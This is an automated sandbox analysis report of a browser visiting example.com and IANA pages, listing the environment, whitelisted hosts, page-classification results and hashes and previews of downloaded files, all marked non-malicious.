                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal48.win@26/31@18/11
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Browse: https://www.iana.org/domains/example
                            • Browse: http://www.iana.org/domains/idn-tables
                            • Browse: http://www.iana.org/domains/arpa
                            • Browse: http://pti.icann.org/
                            • Browse: http://www.iana.org/contact
                            • Browse: http://www.iana.org/about/excellence
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 74.125.133.84, 142.250.184.238, 172.217.16.195, 34.104.35.123, 4.175.87.197, 199.232.214.172, 192.229.221.95, 40.69.42.241, 20.242.39.171, 142.250.186.67, 172.217.18.3, 142.250.185.174
                            • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            No simulations
                            InputOutput
                            URL: https://www.example.com/ Model: jbxai
                            {
                            "brand":[],
                            "contains_trigger_text":false,
                            "trigger_text":"",
                            "prominent_button_name":"unknown",
                            "text_input_field_labels":"unknown",
                            "pdf_icon_visible":false,
                            "has_visible_captcha":false,
                            "has_urgent_text":false,
                            "text":"Example Domain This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission. More information...",
                            "has_visible_qrcode":false}
                            URL: http://www.iana.org/help/example-domains Model: jbxai
                            {
                            "brand":["IANA"],
                            "contains_trigger_text":false,
                            "trigger_text":"",
                            "prominent_button_name":"unknown",
                            "text_input_field_labels":"unknown",
                            "pdf_icon_visible":false,
                            "has_visible_captcha":false,
                            "has_urgent_text":false,
                            "text":"Example Domains As described in RFC 2606 and RFC 6761,
                             a number of domains such as example.com and example.org are maintained for documentation purposes. These domains may be used as illustrative examples in documents without prior coordination with us. They are not available for registration or transfer. We provide a web service on the example domain hosts to provide basic information on the purpose of the domain. These web services are provided as best effort,
                             but are not designed to support production applications. While incidental traffic for incorrectly configured applications is expected,
                             please do not design applications that require the example domains to have operating HTTP service. Further Reading  IANA-managed Reserved Domains Last revised 2017-05-13. Domain Names Number Resources Protocols About Us Root Zone Registry INT Registry ARPA Registry IDN Repository Abuse Information Protocol Registries Time Zone Database Performance Reports Reviews Excellence Contact Us",
                            "has_visible_qrcode":false}
                            URL: http://www.iana.org/contact Model: jbxai
                            {
                            "brand":["IANA"],
                            "contains_trigger_text":false,
                            "trigger_text":"",
                            "prominent_button_name":"unknown",
                            "text_input_field_labels":"unknown",
                            "pdf_icon_visible":false,
                            "has_visible_captcha":false,
                            "has_urgent_text":false,
                            "text":"Contact Us About us Introduction Performance Reporting Procedures Presentations Public Reports Framework Documents Reviews Audits Excellence & Quality Contact us General email contact iana@iana.org Postal address Internet Assigned Numbers Authority 12025 Waterfront Drive,
                             Suite 300 Los Angeles CA 90094 USA Telephone contacts +1-424-254-5300 (phone) +1-424-254-5033 (facsimile) Domain Names Root Zone Registry INT Registry ARPA Registry IDN Repository Number Resources Abuse Information Protocols Protocol Registries Time Zone Database About Us Performance Reports Reviews Excellence Contact Us The IANA functions coordinate the Internet's globally unique identifiers,
                             and are provided by Public Technical Identifiers,
                             an affiliate of ICANN.",
                            "has_visible_qrcode":false}
                            URL: http://www.iana.org/about/excellence Model: jbxai
                            {
                            "brand":["IANA"],
                            "contains_trigger_text":false,
                            "trigger_text":"",
                            "prominent_button_name":"unknown",
                            "text_input_field_labels":"unknown",
                            "pdf_icon_visible":false,
                            "has_visible_captcha":false,
                            "has_urgent_text":false,
                            "text":"Business Excellence and Quality Management We are committed to operations excellence and have had an ongoing Business Excellence activity for the IANA functions since 2009. We are pleased to have received EFQM Committed to Excellence recognition for these departments following an assessment conducted by a panel of three independent assessors in August 2013. Founded in 1989,
                             EFQM (the European Foundation for Quality Management) is the not-for-profit membership foundation that publishes the EFQM Excellence Model,
                             a comprehensive management framework used by over 30,
                            000 organizations around the world. The model helps organizations achieve and sustain outstanding levels of performance that meet or exceed the expectations of all their stakeholders. It allows people to understand the cause and effect relationships between what their organization does and the results it achieves. The model is based on the Fundamental Concepts of Excellence: Adding value for customers Creating a sustainable future Developing organizational capability Harnessing creativity and innovation Leading with vision,
                             inspiration and integrity Managing with agility Succeeding through the talent of people Sustaining outstanding results The Fundamental Concepts of Excellence form the basis for the criteria of the EFQM Excellence Model. We engaged EFQM to perform the assessment and will use the analysis to identify improvements. We remain committed to using the EFQM model to perform continual review and improvement of the IANA services we provide to the community.",
                            "has_visible_qrcode":false}
                            URL: http://www.iana.org/domains/arpa Model: jbxai
                            {
                            "brand":["iana"],
                            "contains_trigger_text":false,
                            "trigger_text":"",
                            "prominent_button_name":"unknown",
                            "text_input_field_labels":"unknown",
                            "pdf_icon_visible":false,
                            "has_visible_captcha":false,
                            "has_urgent_text":false,
                            "text":"ARPA Zone Management The .arpa domain is the \"Address and Routing Parameter Area\" domain and is designated to be used exclusively for Internet-infrastructure purposes. We administer the domain in cooperation with the Internet technical community through the guidance of the Internet Architecture Board. For the management guidelines and operational requirements of the arpa domain,
                             see RFC 3172. The .arpa domain currently includes the following second-level domains:  DOMAIN USAGE / REFERENCE 6tisch.arpa For IPv6 over the Time-Slotted Channel Hopping mode of IEEE 802.15.4 RFC 9031 arpa Reserved exclusively to support operationally-critical infrastructural identifier spaces as advised by the Internet Architecture Board RFC 3172 as112.arpa For sinking DNS traffic for reverse IP address lookups and other applications RFC 7535 e164.arpa For mapping E.164 numbers to Internet URIs RFC 6116 eap-noob.arpa For the Nimble Out-Of-Band authentication method of the Extensible Authentication Protocol framework RFC 9140 home.arpa For non-unique use in residential home networks RFC 8375 in-addr-servers.arpa For hosting authoritative name servers for the in-addr.arpa domain RFC 5855 in-addr.arpa For mapping IPv4 addresses to Internet domain names RFC 1035 ip6-servers.arpa For hosting authoritative name servers for the ip6.arpa domain RFC 5855 ip6.arpa For mapping IPv6 addresses to Internet domain names RFC 3152 ipv4only.arpa For detecting the presence of DNS64 and for learning the IPv6 prefix used for protocol translation RFC 7368 ",
                            "has_visible_qrcode":false}
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:SVG Scalable Vector Graphics image
                            Category:downloaded
                            Size (bytes):32870
                            Entropy (8bit):4.300873890135518
                            Encrypted:false
                            SSDEEP:768:8Zr++SQvCrFQy7t5t1S9+UMTY1UeuXrGI:L+SQ8FQyztg9+UMc1Ue6N
                            MD5:426B3AC01D3584C820F3B7F5985D6623
                            SHA1:6FA7ECC4EB21D4FD7BFD1FD3550F0AAAB0AB43D7
                            SHA-256:888B41C392A51D5AA6CA6DF224E345F74FFBB97A48422753A3E4F90F305D0004
                            SHA-512:CD094F2ECE42AB1E4F789BC3027828CF98CC62044D456B8A5A66E946CB5CC3D3A1984A04C11923918F449A7CDEDBC1F54966679AAA8451D7E536B24637128047
                            Malicious:false
                            Reputation:low
                            URL:https://www.iana.org/_img/2022/iana-logo-header.svg
                            Preview:<?xml version="1.0" encoding="utf-8"?>.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">.<svg version="1.1" id="IANA_Header_Logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px".. y="0px" width="234px" height="72px" viewBox="0 0 468 144" enable-background="new 0 0 468 144" xml:space="preserve">.<g id="Text_Paths">..<path fill="#5A5A58" d="M5.129,136.483v-18.872h2.744v18.872H5.129z"/>..<path fill="#5A5A58" d="M21.929,136.483v-10.332c0-0.709-0.178-1.27-0.532-1.68c-0.355-0.411-0.99-0.616-1.904-0.616...c-0.71,0-1.354,0.098-1.932,0.294c-0.579,0.196-1.148,0.48-1.708,0.854v11.48h-2.492v-14.504c0.336-0.056,0.742-0.098,1.218-0.126...s0.9-0.042,1.274-0.042v1.428h0.14c0.728-0.634,1.437-1.068,2.128-1.302c0.69-0.233,1.418-0.351,2.184-0.351...c0.56,0,1.087,0.075,1.582,0.225c0.494,0.149,0.933,0.396,1.316,0.742c0.382,0.346,0.686,0.803,0.91,1.372...c0.224,0.569,0.336,1.273,0.336,2.113v10.444H21.929z"/>..<path fill="#
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text
                            Category:downloaded
                            Size (bytes):1256
                            Entropy (8bit):4.757453290014263
                            Encrypted:false
                            SSDEEP:24:0pbMMpAYuOjM/fHxAYJwPp2AEPmbW1E6FD8EVyiJZni/1/EmDFf2kzj:0hpqkM6YJwh8PmbWO65siJZi/9jplzj
                            MD5:84238DFC8092E5D9C0DAC8EF93371A07
                            SHA1:4A3CE8EE11E091DD7923F4D8C6E5B5E41EC7C047
                            SHA-256:EA8FAC7C65FB589B0D53560F5251F74F9E9B243478DCB6B3EA79B5E36449C8D9
                            SHA-512:D06B93C883F8126A04589937A884032DF031B05518EED9D433EFB6447834DF2596AEBD500D69B8283E5702D988ED49655AE654C1683C7A4AE58BFA6B92F2B73A
                            Malicious:false
                            Reputation:low
                            URL:https://www.example.com/
                            Preview:<!doctype html>.<html>.<head>. <title>Example Domain</title>.. <meta charset="utf-8" />. <meta http-equiv="Content-type" content="text/html; charset=utf-8" />. <meta name="viewport" content="width=device-width, initial-scale=1" />. <style type="text/css">. body {. background-color: #f0f0f2;. margin: 0;. padding: 0;. font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;. . }. div {. width: 600px;. margin: 5em auto;. padding: 2em;. background-color: #fdfdff;. border-radius: 0.5em;. box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);. }. a:link, a:visited {. color: #38488f;. text-decoration: none;. }. @media (max-width: 700px) {. div {. margin: 0 auto;. width: auto;. }. }. </style> .</head>..<body>.<div>. <h1>Example Domain</h1>. <p>This domai
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:gzip compressed data, from Unix, original size modulo 2^32 12256
                            Category:downloaded
                            Size (bytes):2865
                            Entropy (8bit):7.926093498634702
                            Encrypted:false
                            SSDEEP:48:XHkSSNaaxc4w+QV4X9LBG0ksz9Vqo9FoenKKDnHON5ZfbqMpI6ymXRv0Vl:Bne5dQV4n7ksB5joeKEnuNrfbqMumXRu
                            MD5:63242419A6CB4B75951A7053997A295E
                            SHA1:FABC5E142332C195F951210DA8CA6627C47F0CC5
                            SHA-256:5B42F1405334E6DD937F9543B3CF62A89F6F224EF67F243C1940F310D5CFA8AA
                            SHA-512:AB2BF5383479B53301887F7F9C9732F7383CC92BE9E215C600E9E5CFF194D32224ED3C4D9659C4BC958C0951EAC26B1667986D3673F23A75ADBC89BFEB85B7F7
                            Malicious:false
                            Reputation:low
                            URL:http://www.iana.org/domains/arpa
                            Preview:...........Z.n.....=.o{.l ....q.....4Fq.a;(./..KIL.........}.>IgH.j%.d. .. ...3C.f8....S"c3....T.Z....z.5...k....K.R.u#W...J..U....0..4 Q.l.....{..g.....L.........g.!.....2.M.Y0..)....?....6.1.....3n8....`g.G.(..}#...@..`z....)68...X.....0.4..O...am...4j.G0..0..,...9.xJ.,..)A......R..=b.66G.5.+..?.......V1........&.:.u#...`8.en0 .ju#'.V./....7S.......O..W....!..Vo.h.r`.k/..0T..80tt.z<... .O2e9...t#Z....9...Z.....!5.D07.B.V.J.{..&V......yv#...\I#c)`.mY\wlV.}.`.+L.u.....'....Qa..C...z...<.nT..../:-A.hU.G}....*.c.Jy.X...h.0..v..._G..~..v.o2c.7P.!Ka......y.a.H....'%.51P.Z$....<I...,!w.2...-U`..S.\1.Z..p..$...0...h$.3Rh(..X.......T...`]T.L...."6.b$/T.5.m.WFh......'XN7..$s..n.'nF..$I..G...Tq.e..`.&.Q.b......,fD..w%Y4..D...S..~[.a....x.v.M.WIU..oW.>J7...2b`.C..;.....ne..r"u.!....U.7....o;........%;.. .P....;..H..H!..."....$....G._.Qn5.f...1./X8@.....5V.....,...W.~....W.}.....ID....b...G....3..j..^W.4+.{0..3..N...........5I9.ex};>!r.u.,...~_.h..B.d...Heb.....
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65447)
                            Category:downloaded
                            Size (bytes):89501
                            Entropy (8bit):5.289893677458563
                            Encrypted:false
                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                            Malicious:false
                            Reputation:low
                            URL:https://www.iana.org/_js/jquery.js
                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:gzip compressed data, from Unix, original size modulo 2^32 4747
                            Category:downloaded
                            Size (bytes):1508
                            Entropy (8bit):7.8477027555275205
                            Encrypted:false
                            SSDEEP:24:Xrzf8XZDffoGGCvdLqfo0PjJSSFQukScnoUZGymbk2s5raS/rhXq6vxndE/6DxfH:Xn0XZTfocvdCPj8SFQ87hvbkTb/d1p6S
                            MD5:A4D3A029428859C989B9144EF91C95A7
                            SHA1:968CEE1221DE99445307365EA2B5F24DEA7C96B3
                            SHA-256:B57EDCA2DE1923384FD84209E44DF9AD844F5786E4A1A63684D8DAF3105DF75F
                            SHA-512:74187C0D55B02DA2DB1909EB9C98246D7F79CE04CB4CDA1F35DABEE1F91C0DE353184A861AE0C7B8FBD48192997F7FF69DB11775E1DEF5D5ABDCD3D307760BA9
                            Malicious:false
                            Reputation:low
                            URL:http://www.iana.org/help/example-domains
                            Preview:...........X.n.6.>WO.......S4Z..'A....u.....fWt(Q!..lO}..^..3......hb.+r...7....Y..[..*W.<...2.~.t..W.x.*`/u.ec.4.#\P..LT.Xp..s.....r.M.c'...J7.......0...>.....9....&.R....0.d.I.K) .3&..$W..\..".AIJ6...5..[+.......'q.^X.....T._Aa...Rco..s.&..1.V.v3.e..."e+P....C....vD.S...F.......%..Y#H..M.?v`.{..Y.^.O`...0#.Y...e.....9.<b...r.d9..1..7J/.....Q..|0.@...c...r.3..ot.-..d)......Bqk'q.r..D....}.'*.o.,C...&.9..%..F;-.B.a...MW.`.s..[..Y.<..+b...W.<....sq>..i#.t.....a....h.x....).8)0#......dV....%^....F..@.I/!..wq.b..em>........f'..:5s1.<.....W.F.U..h......F...(...9..NT.[......7.Y0n..j..PFsm.]t5&$....L.-......Fx....Y...Ju...YB.+...A.e+.*. k.D-BkS.&(.W(..X{..."L.R...$..,d..8.ac.x..........6...<f.P*e..U0l.....E...0..J........C@..4..x.(.dy...`..9Jtg....[.0.......B@v.. ..o[%.7.AyWI4[6.".qE[... Y...5U..\t...+.I....@y......c..[.*..n,t..c.<h._" -.?..{sww3..;...;......Ux.......,.. .P...t6MjL....'..$....y._.tm.....g....0.._<O..N.~..y.Y.AH....}.'.y..
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:MS Windows icon resource - 3 icons, 16x16, 8 bits/pixel, 32x32, 8 bits/pixel
                            Category:dropped
                            Size (bytes):7406
                            Entropy (8bit):5.622090120332121
                            Encrypted:false
                            SSDEEP:96:JHKywzNjZb7coRVbm0SgR0M8cym9TgbvT4j92l6H4Yw7Extm9gnwbn:Nkr9R7uM8rbvT4j9Pw7cMbn
                            MD5:E14A2530B3E9141D357AFAF2314D2E49
                            SHA1:79B6F05AC4FE930DFC574C9E24B5A5FC11B936FF
                            SHA-256:24BFB441173C83B8184B0C19CC8695615B5A3878A00E63E3DC52B3C430B18AB3
                            SHA-512:B4D3A47186005F0871B84528E3DDC010366FDFF189FAA2EEB8189DEA3E1CF893593E0D11A7E94D1EDDF62C62F145AA26D5475E9D7E7F1CC5AD725ADD05DE7C24
                            Malicious:false
                            Reputation:low
                            Preview:..............h...6... ..............00..........F...(....... ...............................{w..P...B...>...E...t...j...K...I....f...z..M...W...H...P...T....b...w..u....\.......l..i....t...e...T..X...Z....W!.].#..^$..u&.y.&.a.).T.,..U/.y./.eb0..;4.j.4..b6.Pb:.n.:.r.;..}@..lB..tG..zL.z.L...M.uKN...N.iaO..FQ.czQ...U...V..pX...X..[Z..xZ..m_...c.r~i...i.w.j..yl...s..ry...y...{..o}...................|....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text
                            Category:downloaded
                            Size (bytes):1256
                            Entropy (8bit):4.757453290014263
                            Encrypted:false
                            SSDEEP:24:0pbMMpAYuOjM/fHxAYJwPp2AEPmbW1E6FD8EVyiJZni/1/EmDFf2kzj:0hpqkM6YJwh8PmbWO65siJZi/9jplzj
                            MD5:84238DFC8092E5D9C0DAC8EF93371A07
                            SHA1:4A3CE8EE11E091DD7923F4D8C6E5B5E41EC7C047
                            SHA-256:EA8FAC7C65FB589B0D53560F5251F74F9E9B243478DCB6B3EA79B5E36449C8D9
                            SHA-512:D06B93C883F8126A04589937A884032DF031B05518EED9D433EFB6447834DF2596AEBD500D69B8283E5702D988ED49655AE654C1683C7A4AE58BFA6B92F2B73A
                            Malicious:false
                            Reputation:low
                            URL:https://www.example.com/favicon.ico
                            Preview:<!doctype html>.<html>.<head>. <title>Example Domain</title>.. <meta charset="utf-8" />. <meta http-equiv="Content-type" content="text/html; charset=utf-8" />. <meta name="viewport" content="width=device-width, initial-scale=1" />. <style type="text/css">. body {. background-color: #f0f0f2;. margin: 0;. padding: 0;. font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;. . }. div {. width: 600px;. margin: 5em auto;. padding: 2em;. background-color: #fdfdff;. border-radius: 0.5em;. box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);. }. a:link, a:visited {. color: #38488f;. text-decoration: none;. }. @media (max-width: 700px) {. div {. margin: 0 auto;. width: auto;. }. }. </style> .</head>..<body>.<div>. <h1>Example Domain</h1>. <p>This domai
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:SVG Scalable Vector Graphics image
                            Category:downloaded
                            Size (bytes):22682
                            Entropy (8bit):4.165274836563167
                            Encrypted:false
                            SSDEEP:384:zoTjxFlll3diqvd2BzJmQNDd/7vjlszJwBKGO3QKtabko2DRbVIw9ll+CLigYr:z2FTlm9mava9wBKGOAKWko2lVv9llqr
                            MD5:D33F7D2281C7CDA90E326CA2639013F1
                            SHA1:38E07980C5212A142B0555434AC8829B0DE40FE8
                            SHA-256:EEDA4C6E972642542B30C54530D53DF135452660F18C754D36AE2F676107CD00
                            SHA-512:333587B51145BB60D3FD7191DFE03D8ED40A2956A10DF8B6F4EE9775CF7E17BE518B5E716F981EC37BE670610D80B150A69AACCBA52EE5D839859929A8948040
                            Malicious:false
                            Reputation:low
                            URL:https://www.iana.org/about/excellence/efqm-committed-2013.svg
                            Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 17.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="200px" height="124px" viewBox="0 0 200 124" enable-background="new 0 0 200 124" xml:space="preserve">.<g>..<path fill="#231F20" d="M75.193,58.385h15.316v4.418H79.981v4.054h9.423v4.42h-9.423v4.418h10.528v4.423H75.193V58.385z"/>..<path fill="#231F20" d="M92.981,58.385h14.581v4.418h-9.791v4.421h9.055v4.419h-9.055v8.474h-4.791V58.385z"/>..<path fill="#231F20" d="M134.238,80.117h-13.169c-6.787,0-11.789-4.146-11.789-11.145c0-6.57,5.158-11.141,11.606-11.141...c6.442,0,11.601,4.604,11.601,11.141c0,3.07-1.35,6.081-4.33,7.4v0.06h6.081V80.117z M120.886,75.695...c3.651,0,6.63-2.974,6.63-6.722c0-3.742-2.978-6.724-6.63-6.724c-3.656,0-6.63
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:gzip compressed data, from Unix, original size modulo 2^32 6871
                            Category:downloaded
                            Size (bytes):2193
                            Entropy (8bit):7.910262303899838
                            Encrypted:false
                            SSDEEP:48:Xvty8fk51xkLwuU4xNznOqQwhbbbUnphLBtBb6oB/8twPatdvDCF:Vy8f9LHPzOqQwhbbbELLLvB/qFDW
                            MD5:3EE2C86E01E2F42B95E0BB309A8E33C8
                            SHA1:C28841C44209523A56ABBC7939B898A4AA854C2D
                            SHA-256:7069BC24DBF92735B7F46307A429360C5EC8B97B06124885C4A6FB40502770F7
                            SHA-512:3C719656F1858062CB2C75393675E836CCDD1DD952F56A51BB501F457873065FBD91E7B96BDE41E6C8C94C02222864F9542D9CF01082954C17E4C4AD85B35723
                            Malicious:false
                            Reputation:low
                            URL:http://www.iana.org/about/excellence
                            Preview:...........Y.n......b.],l..m.^lbI..$X....fQ.7.<.&&9..P..(.....I.....~b+..T..yf....3.~...*.sW..a.C2....:.r.....$k.....,3.k-s.V.,..*.0..G.-.I....FQ...H....*.O.Z..k]:`.,I$..6..=..%....)eA.h.hYi.z.K...(..J)./.B..)..6.9....P.U. ...UNvN.RsC.Q...&.g......K.X.h.h...!.!BZ;. E$X.Q...&.dMP..d..C!..=...r.fS.*..z.|......&e..m..SMf5.h..0.../@gU..a.a...4..l..Nf|$..fj!T6..0...\.t...d.7.A.V.6Bg...@w`..H..>.E.T.|..0.=~..n.Osi.(*.B.Sp...u....\...f....Q^...9L.....h.S...}<......`..5..8~.......+..c('.v......9L....y.Q.Qq.9.....D...Z..((.Ve....O....r...(.`.?.....Q4.t..Q......2U.^....Q..s..._...E/..1..X&4.T.....e.....!.C:....p......`c..a5.+.6.% ..."......m..H.2...LCd....S.6.T....$n.n....@.h...^.D#F...A...PJj..Pn8<D.'.WI.\..l..6.d9..^R....z..S...@N.k......H_...V..N..y...%....N...^.I`...l....:e....puI....,..Y.t._........zV['.S.I5f...5vf.|....U..l.7........!y"..>)...%FF.*'..gz.* .4.I..U=...M...{^..3.O.".]..Si.<Qt\...-.y......2....3...R..B.3......g......AL...A...
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:Unicode text, UTF-8 text
                            Category:downloaded
                            Size (bytes):42327
                            Entropy (8bit):4.972717392486359
                            Encrypted:false
                            SSDEEP:768:kGrGTv11TtFF7OYEI3bF8zpxdr3/Tf4BFqP4Qze9pK7A/T81wMXR83QdkgBBvuy9:kGrGTv11TtFRmI3bizndr3b4BEwQze9q
                            MD5:E57630C9471CA1DF5ACFE39720D616D5
                            SHA1:038003806DFA912AC27A28DAA1A19347C0F46020
                            SHA-256:9AA975D9E792847BA5441113AA34AA2AB0B7A274B3FB5BB5B69F9B4AC87C61BF
                            SHA-512:EF8A7687636621BDC0357D28C696237F23C9A351738D442021569C76D4564834E2AF4664C23A4C6E7ACD22F492BDE88205F9C8FC22665995612E15F64A7293C5
                            Malicious:false
                            Reputation:low
                            URL:https://www.iana.org/_css/2022/iana_website.css
                            Preview:@charset "UTF-8";.@font-face {. font-family: "Noto";. src: local("Noto Sans"), local("NotoSans"), url("/_img/2022/fonts/NotoSans-Regular.woff");. font-weight: 400;.}.@font-face {. font-family: "Noto";. src: local("Noto Sans"), local("NotoSans"), url("/_img/2022/fonts/NotoSans-Italic.woff");. font-weight: 400;. font-style: italic;.}.@font-face {. font-family: "Noto";. font-weight: 600;. src: local("Noto Sans Bold"), local("NotoSans-Bold"), url("/_img/2022/fonts/NotoSans-Bold.woff");.}.@font-face {. font-family: "Source Code Pro";. src: local("Source Code Pro"), url("/_img/2022/fonts/SourceCodePro-Regular.woff");.}.@font-face {. font-family: "s-deva";. src: url("/_img/2022/fonts/NotoSansDevanagari-Regular.ttf");.}..script-deva {. font-family: "s-deva";.}..@font-face {. font-family: "s-hebr";. src: url("/_img/2022/fonts/NotoSansHebrew-Regular.ttf");.}..script-hebr {. font-family: "s-hebr";.}..html, body, div, span, object, iframe, h1, h2, h3, h4, h5, h6,.p, blockquote, p
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:SVG Scalable Vector Graphics image
                            Category:dropped
                            Size (bytes):22682
                            Entropy (8bit):4.165274836563167
                            Encrypted:false
                            SSDEEP:384:zoTjxFlll3diqvd2BzJmQNDd/7vjlszJwBKGO3QKtabko2DRbVIw9ll+CLigYr:z2FTlm9mava9wBKGOAKWko2lVv9llqr
                            MD5:D33F7D2281C7CDA90E326CA2639013F1
                            SHA1:38E07980C5212A142B0555434AC8829B0DE40FE8
                            SHA-256:EEDA4C6E972642542B30C54530D53DF135452660F18C754D36AE2F676107CD00
                            SHA-512:333587B51145BB60D3FD7191DFE03D8ED40A2956A10DF8B6F4EE9775CF7E17BE518B5E716F981EC37BE670610D80B150A69AACCBA52EE5D839859929A8948040
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 17.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="200px" height="124px" viewBox="0 0 200 124" enable-background="new 0 0 200 124" xml:space="preserve">.<g>..<path fill="#231F20" d="M75.193,58.385h15.316v4.418H79.981v4.054h9.423v4.42h-9.423v4.418h10.528v4.423H75.193V58.385z"/>..<path fill="#231F20" d="M92.981,58.385h14.581v4.418h-9.791v4.421h9.055v4.419h-9.055v8.474h-4.791V58.385z"/>..<path fill="#231F20" d="M134.238,80.117h-13.169c-6.787,0-11.789-4.146-11.789-11.145c0-6.57,5.158-11.141,11.606-11.141...c6.442,0,11.601,4.604,11.601,11.141c0,3.07-1.35,6.081-4.33,7.4v0.06h6.081V80.117z M120.886,75.695...c3.651,0,6.63-2.974,6.63-6.722c0-3.742-2.978-6.724-6.63-6.724c-3.656,0-6.63
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):68
                            Entropy (8bit):4.285940878544194
                            Encrypted:false
                            SSDEEP:3:C3scYYhJQkKJdBSEoEGBkADMtv:C3L+dIXCmMtv
                            MD5:BA2525002CEDBA259221570E88406E52
                            SHA1:B1BBBD7E1220F145C43A176A5232C7FA2593D236
                            SHA-256:4328256D40CDAA047D99460B43F6D77366982975E891A932EF8E00736FD82E1A
                            SHA-512:39DC70B7D114BD4F90E398844FA8E81B4A79EFA8E13971A5D3339C846FDB98F574B656994F1150FB6A4EB70E747378FF94A0A61C194CE969ABED00B358E5069F
                            Malicious:false
                            Reputation:low
